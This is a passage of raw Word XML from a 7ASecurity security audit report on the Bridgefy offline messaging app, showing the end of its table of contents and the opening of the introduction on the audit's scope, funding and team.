            <w:r>
              <w:rPr/>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>contain</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Backdoors</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Unclear)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>130</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="8987" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250002">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-Q12:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Bridgefy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>seems</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>free</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>from</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Root</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>PrivEsc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Artifacts</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Unclear)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>131</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:pos="8987" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250001">
            <w:r>
              <w:rPr/>
              <w:t>BFY-01-Q13:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Bridgefy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>does</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>not</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>appear</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>use</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-9"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>Obfuscation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>(Unclear)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>131</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:pos="8987" w:val="left" w:leader="none"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250000">
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Conclusion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>133</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:spacing w:after="0"/>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1351" w:top="1786" w:bottom="1653" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="772"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250054" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:color w:val="002F7B"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="197"/>
        <w:ind w:left="720" w:right="369" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>“Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>free</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>messaging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>works</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>without</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Internet.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Perfect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>natural disasters, large events, and at school!”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:right="363"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>From:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://bridgefy.me/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This document outlines the results of a penetration test and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>whitebox </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>security review conducted against the Bridgefy platform. The project was solicited by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Bridgefy Inc.</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, funded by the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Open Technology Fund </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(OTF), and executed by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>December 2022 and January 2023. The audit team dedicated 56 working days to complete this assignment. Please note that this is the first penetration test for this project. Consequently, identification of new security weaknesses was expected to be easier during this assignment, as more vulnerabilities are identified and resolved after each testing cycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="373"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>During</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>iteration,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>aim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>review</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>posture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>innovative solution that facilitates messaging during internet shutdown occurrences. The goal was to review the tool as thoroughly as possible, to ensure Bridgefy users can be provided with the best possible security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The methodology implemented was </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>whitebox</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>provided</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a test environment, test accounts, documentation, source code, AWS credentials and staging Android and iOS binaries. A team of 7 senior auditors carried out all tasks required for this engagement, including preparation, delivery, documentation of findings and communication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A number of necessary arrangements were in place by December 2022, to facilitate a straightforward commencement for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>In</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>order</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>enable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>effective</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>collaboration, information to coordinate the test was relayed through email, as well as a shared</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Slack channel. The Bridgefy team was helpful and responsive throughout the audit, even during out of office hours, which ensured that 7ASecurity was provided with the necessary access and information at all times, thus avoiding unnecessary delays.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="371"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The Bridgefy team had initial difficulties to provide the project deliverables on time, and hence the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>defined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>organized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>iteratively,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>able</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>facilitate each work package for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>team.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>7ASecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>provided</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>regular</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>updates</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>regarding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the audit status and its interim findings during the engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Please note 7ASecurity had some setbacks to test the mobile applications during this iteration:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>apps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>unstable,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>certain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>workarounds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="71"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>consuming</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(i.e.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId10"/>
          <w:footerReference w:type="default" r:id="rId11"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
